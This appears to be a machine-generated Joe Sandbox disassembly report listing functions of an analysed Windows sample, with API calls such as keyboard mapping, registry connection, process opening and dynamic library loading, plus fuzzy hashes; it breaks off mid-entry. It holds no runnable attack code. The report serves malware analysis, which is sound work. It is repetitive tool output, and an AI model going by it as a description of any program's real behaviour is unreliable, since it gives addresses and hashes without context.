                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 3470314060-0
                            • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                            • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                            Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                            Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                            Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 442100245-0
                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                            Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                            • _wcslen.LIBCMT ref: 0045F94A
                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                            • String ID: 0
                            • API String ID: 621800784-4108050209
                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                            Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SetErrorMode.KERNEL32 ref: 004781CE
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • SetErrorMode.KERNEL32(?), ref: 00478270
                            • SetErrorMode.KERNEL32(?), ref: 00478340
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                            • String ID: \VH
                            • API String ID: 3884216118-234962358
                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                            Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                            • IsMenu.USER32(?), ref: 0044854D
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                            • DrawMenuBar.USER32 ref: 004485AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert
                            • String ID: 0
                            • API String ID: 3076010158-4108050209
                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                            Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 1589278365-1403004172
                            • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                            • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                            Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                            Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                            Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: SysAnimate32
                            • API String ID: 0-1011021900
                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                            Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                            • GetFocus.USER32 ref: 0046157B
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                            • __swprintf.LIBCMT ref: 00461608
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                            • String ID: %s%d
                            • API String ID: 2645982514-1110647743
                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                            Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                            Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process$CloseCountersCurrentHandleOpen
                            • String ID:
                            • API String ID: 3488606520-0
                            • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                            • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                            Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                            Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
